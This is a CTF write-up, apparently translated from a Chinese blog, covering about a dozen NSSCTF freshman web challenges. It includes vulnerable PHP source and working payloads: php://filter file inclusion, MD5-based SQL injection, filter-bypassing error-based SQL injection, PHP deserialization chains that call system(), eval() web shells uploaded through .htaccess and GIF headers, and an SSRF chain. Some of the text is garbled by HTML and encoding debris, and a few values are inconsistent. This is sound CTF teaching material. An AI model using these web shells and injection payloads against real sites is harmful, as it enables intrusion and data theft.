Table of Contents
ez_ez_php
ez_ez_php(revenge)
Wonderful MD5
1z_unserialize
numgame
where_am_i
ez_ez_unserialize
js_sign
xff
webdog1__start
ez_sql
funny_php
funny_web
ez_1zpop
Ez_upload
file_master
Power!
ez_ez_php
source code:
<?php
error_reporting(0);
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 3) === "php" ) {
echo "Nice!!!";
include($_GET["file"]);
}
else {
echo "Hacker!!";
}
}else {
highlight_file(__FILE__);
}
//flag.php
The file contains and also limits the first 3 characters to php
Direct php pseudo-protocol
?file=php://filter/convert.base64-encode/resource=flag.php
payload:
?file=php://filter/read=convert.base64-encode/resource=flag
base64 decoding
ez_ez_php(revenge)
source code:
<?php
error_reporting(0);
if (isset($_GET['file'])) {
if ( substr($_GET["file"], 0, 3) === "php" ) {
echo "Nice!!!";
include($_GET["file"]);
}
else {
echo "Hacker!!";
}
}else {
highlight_file(__FILE__);
}
//flag.php
payload:
?file=php://filter/convert.base64-encode/resource=/flag
base64 decoding 
Wonderful MD5
ffifdyop
After md5 encryption: 276f722736c95d99e921722cf9ed621c
Then convert it into a string: ‘or’6'or'66?]!r,b
use:
select * from admin where password=”or’6
It is equivalent to select * from admin where password=”or 1 to implement sql injection
Check out the source code
md5 bypass
payload:
?x=240610708 & amp;y=QLTNHNDT
Visit f1na11y.php
Direct array bypass
wqh[]=1 & amp;dsy[]=2
1z_unserialize
source code:
<?php
class lyh{
public $url = 'NSSCTF.com';
public $lt;
public $lly;
function __destruct()
{
$a = $this->lt;
$a($this->lly);
}
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
?>
This is the answer to this questionAs long as the injection point is passed, $a becomes system(); $this->lly becomes ls or cat, and it is a simple command injection
payload:
<?php
class lyh{
public $url = 'NSSCTF.com';
public $lt;
public $lly;
}
$a = new lyh();
$a->lt='system';
$a->lly='ls /';
echo serialize($a);
?>
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt"; s:6:"system";s:3:"lly";s:4:"ls /";}
The next step is just cat flag.
nss=O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt"; s:6:"system";s:3:"lly";s:9:"cat /flag";}
numgame
Open developer tools in settings
Just go into settings and disable js
flag in js file
base64 decoding
Our The purpose is to pass the parameter p through get and then call the ctf static method in nss with the help of call_user_func.
if (preg_match(“/n|c/m”,$_GET[‘p’], $matches))
Just disable n and c, and then use /m in multi-text form,
call_user_func($_GET[‘p’]); Call the function passed in by p
Here is a knowledge point
You can call the static method of CTF in the class through NSS::CTF. The class name and method name here are not case-sensitive.
So we can capitalize and bypass
And because hint2.php
So payload :
?p=Nss2::Ctf
where_am_i
guess phone number
Just search for pictures
02886112888
ez_ez_unserialize
source code:
<?php
class
{
public $x = __FILE__;
function __construct($x)
{
$this->x = $x;
}
function __wakeup()
{
if ($this->x !== __FILE__) {
$this->x = __FILE__;
}
}
function __destruct()
{
highlight_file($this->x);
//flag is in fllllllag.php
}
}
if (isset($_REQUEST['x'])) {
@unserialize($_REQUEST['x']);
} else {
highlight_file(__FILE__);
}
payload:
<?php
class
{
public $x = 'fllllllag.php';
}
$a=new X;
echo serialize($a);
?>
O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}
Also bypass the __wakeup function
So change it to:
?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
js_sign
Look at the source code
There is js
This should be the key to solving the problem
A tool is used here
CTF online tool – online tap code | tap code encoding | tap code algorithm | tap code (hiencode.com)
Decode with spaces
3343431344215434452124331421311122125444113513341415
This will appear
flag
NSSCTF{youfindflagbytapcode}
xff
webdog1__start
The general md5 bypass is to pass in the md5 value starting with 0e, because in weak comparison, the number of a string will be intercepted in the weak comparison. Until the character cutoff is encountered, for the value of 0e + number, only the 0 before e will be intercepted. , so even if the incoming md5 value is equal to $md5, it still needs to be equal to its own md5 value. We can choose 0e or a number that still starts with 0e after encryption. For example: 0e215962017, and these pure strings are converted to 0e + number of digits: QNKCDZO, s878926199a
?web=0e215962017
View source code
The bot is usually robots.txt. When you answer questions in the future, you may occasionally encounter situations where robots.txt is leaked and you will get a prompt.
It will be garbled at first, just fix it (if it is Firefox, you can find it in the customized toolbar)
It’s quite hidden
here strstr Filtered by spaces
str_ireplace replaces flag with spaces
payload:
?get=system(ls);
Equivalent to (tab)
?get=system("cat /f*");
ez_sql
A relatively safe method to pass parameters. This should refer to POST passing parameters.
Try to pass a
Things shouldn’t be that simple
Know by trying that spaces and or are filtered
You can use /**/ to replace spaces or you can use double writing
nss=1'/**/oorrder/**/by/**/4#
We can know that the database has 3 columns
Explode the database (the union method is the same as above)
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/database()),0x7e),1)#< /pre> <p><img alt="" height="1200" src="//i2.wp.com/img-blog.csdnimg.cn/c6ebff44651c4a05947345602d305776.png" width="1200"></p> <p>Explosion data table (or of information also needs to be filtered)</p> <pre>nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(table_name)/**/from/** /infoorrmation_schema.tables/**/where/**/table_schema='NSS_db'),0x7e),1) #
Exploding columns in NSS_tb
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(column_name)/**/from/** /infoorrmation_schema.columns/**/where/**/table_name='NSS_tb'),0x7e),1) #
blast flag
nss=1'/**/ununionion/**/select/**/1,updatexml(1,concat(0x7e,(select/**/group_concat(flll444g)/**/from/** /NSS_tb),0x7e),1) #
It’s fake at first glance
BlastingSecr3t
nss=0'/**/ununionion/**/select/**/1,(select/**/group_concat(Secr3t)/**/from/**/NSS_tb),3#</ pre>
<p><img alt="" height="1200" src="//i2.wp.com/img-blog.csdnimg.cn/8f88017e1b0e499eafc87bfa0d03f1e6.png" width="1200"></p>
<h2 id="funny_php">funny_php</h2>
<p>source code:</p>
<pre><?php
session_start();
highlight_file(__FILE__);
if(isset($_GET['num'])){
if(strlen($_GET['num'])<=3 & amp; & amp;$_GET['num']>999999999){
echo ":D";
$_SESSION['L1'] = 1;
}else{
echo ":C";
}
}
if(isset($_GET['str'])){
$str = preg_replace('/NSSCTF/',"",$_GET['str']);
if($str === "NSSCTF"){
echo "wow";
$_SESSION['L2'] = 1;
}else{
echo $str;
}
}
if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){
if($_POST['md5_1']!==$_POST['md5_2'] & amp; & amp;md5($_POST['md5_1'])==md5($_POST[' md5_2'])){
echo "Nice!";
if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){
if(is_string($_POST['md5_1']) & amp; & amp;is_string($_POST['md5_2'])){
echo "yoxi!";
$_SESSION['L3'] = 1;
}else{
echo "X(";
}
}
}else{
echo "G";
echo $_POST['md5_1']."\\
".$_POST['md5_2'];
}
}
if(isset($_SESSION['L1']) & amp; & amp;isset($_SESSION['L2']) & amp; & amp;isset($_SESSION['L3']) ){
include('flag.php');
echo $flag;
}
?>
Let’s explain step by step
first step
if(isset($_GET['num'])){
if(strlen($_GET['num'])<=3 & amp; & amp;$_GET['num']>999999999){
echo ":D";
$_SESSION['L1'] = 1;
}else{
echo ":C";
}
}
It is required that the length of num is less than or equal to 3, but greater than 999999999. It is easy to think of 1e9 passing parameters.
So payload:
?num=1e9
Step 2
if(isset($_GET['str'])){
$str = preg_replace('/NSSCTF/',"",$_GET['str']);
if($str === "NSSCTF"){
echo "wow";
$_SESSION['L2'] = 1;
}else{
echo $str;
}
}
This will replace the NSSCTF in the string you passed in with empty, then we only need to use double writing to bypass it.
?str=NSSNSSCTFCTF
third step
if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){
if($_POST['md5_1']!==$_POST['md5_2'] & amp; & amp;md5($_POST['md5_1'])==md5($_POST[' md5_2'])){
echo "Nice!";
if(isset($_POST['md5_1']) & amp; & amp;isset($_POST['md5_2'])){
if(is_string($_POST['md5_1']) & amp; & amp;is_string($_POST['md5_2'])){
echo "yoxi!";
$_SESSION['L3'] = 1;
}else{
echo "X(";
}
}
}else{
echo "G";
echo $_POST['md5_1']."\\
".$_POST['md5_2'];
}
}
Here you can directly bypass the md5 weak type
md5_1=240610708 & amp;md5_2=QLTHNDT
So payload:
GET ?num=1e9 &str=NSSNSSCTFCTF POST md5_1=240610708 &md5_2=QLTNHNDT
funny_web
Account: NSS
Password: 2122693401
payload:
?num=12345a
ez_1zpop
source code:
<?php
error_reporting(0);
classdxg
{
function fmm()
{
return "nonono";
}
}
classlt
{
public $impo='hi';
public $md51='weclome';
public $md52='to NSS';
function__construct()
{
$this->impo = new dxg;
}
function __wakeup()
{
$this->impo = new dxg;
return $this->impo->fmm();
}
function __toString()
{
if (isset($this->impo) & amp; & amp; md5($this->md51) == md5($this->md52) & amp; & amp; $this->md51 != $this- >md52)
return $this->impo->fmm();
}
function __destruct()
{
echo $this;
}
}
class fin
{
public $a;
public $url = 'https://www.ctfer.vip';
public $title;
function fmm()
{
$b = $this->a;
$b($this->title);
}
}
if (isset($_GET['NSS'])) {
$Data = unserialize($_GET['NSS']);
} else {
highlight_file(__file__);
}
fin object
The fmm method assigns a value to?, when the function is called, if b=’system’ is assigned, when the function is called, if b=’system’
title and then pass in the command we want
Finally, you can get the example, system(ls’) => ?=′′;a=′system′;title=target command’
lt object
Deserialization triggers __wakeup, __destruct, and in the __wakeup method, give the impo instance a dxg object and return it directly. Effective information cannot be obtained. The method to bypass __wakeup is very simple. You only need to convert the deserialized string into Increase the number of object attributes, for example, O:3:”fin”:3:{s:1:”a”;N;s:3:”url”;N;s:5:”title”;N;} => O:3:”fin”:4:{s:1:”a”;N;s:3:”url”;N;s:5:”title”;N;}
It is very simple to trigger the __destruct method. It outputs itself as a string, directly triggers the __toString method, and returns the fmm method.
payload:
<?php
classlt
{
public $impo;
public $md51='240610708';
public $md52='QLTNHNDT';
}
class fin
{
public $a='system';
public $ur='111' ;
public $title='ls /';
}
$aa=new lt();
$aa->impo=new fin();
echo serialize($aa);
?>
Modify the number of lt attributes here to bypass __wakeup
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a\ ";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:4:"ls / ";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}
take flag
payload:
<?php
classlt
{
public $impo;
public $md51='240610708';
public $md52='QLTNHNDT';
}
class fin
{
public $a='system';
public $ur='111' ;
public $title='cat /flag';
}
$aa=new lt();
$aa->impo=new fin();
echo serialize($aa);
?>
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a\ ";s:6:"system";s:2:"ur";s:3:"111";s:5:"title";s:9:"cat / flag";}s:4:"md51";s:9:"240610708";s:4:"md52";s:7:"QLTHNDT";}
Ez_upload
File Upload
Upload .htaccess file
<FilesMatch "mochu"> SetHandler application/x-httpd-php </FilesMatch>
Modify Content-Type
Upload shell.mochu
<script language="php">@eval($_POST['1']);</script>
Just access shell.mochu
file_master
First write a.php
write
GIF89a <?=eval($_POST['1']);?>
upload
Modify Content-Type
Found that height and width have limitations
Modify GIF89a to #define height 1 #define width 1
Ant Sword is connected but I can’t access the flag. I don’t know why.
I’ll look at what other masters wrote later.
#define height 1 #define width 1 <?=`nl /f*`;?>
Power!
Take a look at the source code
Blind guess get transfer source
Source code :
<?php
class FileViewer{
public $black_list = "flag";
public $local = "http://127.0.0.1/";
public $path;
public function __call($f,$a){
$this->loadfile();
}
public function loadfile(){
if(!is_array($this->path)){
if(preg_match("/".$this->black_list."/i",$this->path)){
$file = $this->curl($this->local."cheems.jpg");
}else{
$file = $this->curl($this->local.$this->path);
}
}else{
$file = $this->curl($this->local."cheems.jpg");
}
echo '<img src="data:jpg;base64,'.base64_encode($file).'"/>';
}
public function curl($path){
$url = $path;
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_HEADER, 0);
$response = curl_exec($curl);
curl_close($curl);
return $response;
}
public function __wakeup(){
$this->local = "http://127.0.0.1/";
}
}
class Backdoor{
public $a;
public $b;
public $superhacker = "hacker.jpg";
public function goodman($i,$j){
$i->$j = $this->superhacker;
}
public function __destruct(){
$this->goodman($this->a,$this->b);
$this->a->c();
}
}
if(isset($_GET['source'])){
highlight_file(__FILE__);
}else{
if(isset($_GET['image_path'])){
$path = $_GET['image_path']; //flag in /flag.php
if(is_string($path) & amp; & amp;!preg_match("/http:|gopher:|glob:|php:/i",$path)){
echo '<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
}else{
echo '<h2>Seriously</h2><img src="data:jpg;base64,'.base64_encode(file_get_contents("cheems.jpg")).'"/>' ;
}
}else if(isset($_GET['path_info'])){
$path_info = $_GET['path_info'];
$FV = unserialize(base64_decode($path_info));
$FV->loadfile();
}else{
$path = "vergil.jpg";
echo '<h2>POWER!!</h2>
<img src="data:jpg;base64,'.base64_encode(file_get_contents($path)).'"/>';
}
}
?>
Didn’t quite understand
Check out the boss’s wp here
NSS[SWPUTF 2022 Freshman Competition]ez_sql + funny_php + js_sign + funny_web + Power! – bilibili (bilibili.com)
<?php
class FileViewer{
public $black_list ="The blacklist has nothing to do with me";
public $local;
public $path="flag.php";
}
class Backdoor{
public $a;
public $b;
public $superhacker ="127.0.0.1:65500/";
}
$m = new FileViewer;
$n = new Backdoor;
$n->a=$m;
$n->b="local";
$m->local=$n;
echo (base64_encode(serialize($m)));
?>
payload:
?path_info=TzoxMDoiRmlsZVZpZXdlciI6Mzp7czoxMDoiYmxhY2tfbGlzdCI7czozMDoi6buR5ZCN5Y2V5LuA5LmI55qE566h5LiN552A5oiRIjtzOjU6ImxvY2FsIjtPOjg6IkJhY2tkb29y IjozOntzOjE6ImEiO3I6MTtzOjE6ImIiO3M6NToibG9jYWwiO3M6MTE6InN1cGVyaGFja2VyIjtzOjE2OiIxMjcuMC4wLjE6NjU1MDAvIjt9czo0OiJwYXRoIjtzOjg6ImZsYWcucGhwIjt9
base64 decoding
